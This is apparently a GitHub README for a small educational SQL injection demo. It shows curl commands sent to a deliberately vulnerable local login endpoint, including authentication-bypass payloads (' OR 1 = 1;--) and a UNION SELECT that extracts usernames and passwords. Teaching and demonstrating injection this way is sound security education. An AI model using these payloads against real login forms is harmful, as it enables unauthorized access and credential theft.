SQL Injection Demo

Execute Server

python main.py

Test Server

Tests are executed on Windows

curl -d "username=felix&password=pwfelix" -X POST http://localhost:5000/login_form_vulnerable
{"status":"success"}

curl -d "username=felix&password=wrongPW" -X POST http://localhost:5000/login_form_vulnerable
{"status":"fail"}

Injection basic attack

curl -d "username=felix&password=' OR 1 = 1;--" -X POST http://localhost:5000/login_form_vulnerable
{"status":"success"}

curl -d "username=felix&password=' OR '1' = '1" -X POST http://localhost:5000/login_form_vulnerable
{"status":"success"}

Injection UNION attack

curl -d "username=felix&password=' UNION SELECT username, password FROM employees WHERE username = '' OR '1' = '1" -X POST http://localhost:5000/login_form_vulnerable
{"status":"success"}

Name		Name	Last commit message	Last commit date
Latest commit History 10 Commits
.gitignore		.gitignore
README.md		README.md
main.py		main.py

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

SQL Injection Demo

Execute Server

Test Server

About

Releases

Packages

Contributors 2

Languages

felix80p/sql_injection_demonstration

Folders and files

Latest commit

History

Repository files navigation

SQL Injection Demo

Execute Server

Test Server

About

Resources

Stars

Watchers

Forks

Releases

Packages 0

Contributors 2

Languages

Packages